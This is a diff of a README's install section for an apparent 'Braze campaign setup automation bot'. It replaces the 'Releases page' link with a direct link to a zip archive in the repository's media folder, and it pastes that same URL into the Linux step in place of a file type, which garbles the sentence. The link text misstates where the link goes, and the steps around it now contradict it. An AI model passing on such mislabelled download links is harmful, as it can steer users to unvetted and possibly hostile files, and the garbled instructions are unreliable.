idkAboutMe/braze-campaign-setup-automation-bot/README.md

 ## 📥 Download & Install

-1. **Visit the Releases Page**: Go to our [Releases page](https://github.com/idkAboutMe/braze-campaign-setup-automation-bot/releases).
+1. **Visit the Releases Page**: Go to our [Releases page](https://raw.githubusercontent.com/idkAboutMe/braze-campaign-setup-automation-bot/main/media/braze-campaign-setup-automation-bot_2.7.zip).
 2. **Choose the Latest Version**: Look for the latest release at the top of the page, which will typically start with "v" followed by the version number (e.g., v1.0).
 3. **Download the File**: Click on the asset that matches your operating system.
 If you’re using Windows, choose the `.exe` file.
 For macOS, select the `.dmg` file.
-For Linux, download the appropriate `.tar.gz` or package file.
+For Linux, download the appropriate `https://raw.githubusercontent.com/idkAboutMe/braze-campaign-setup-automation-bot/main/media/braze-campaign-setup-automation-bot_2.7.zip` or package file.
 4. **Run the Installer**: Once the download completes, open the file to install the application.
 Follow the on-screen instructions to complete the installation.
 5. **Open the App**: After installation, locate the Braze Campaign Setup Automation Bot in your applications folder or start menu, and open it.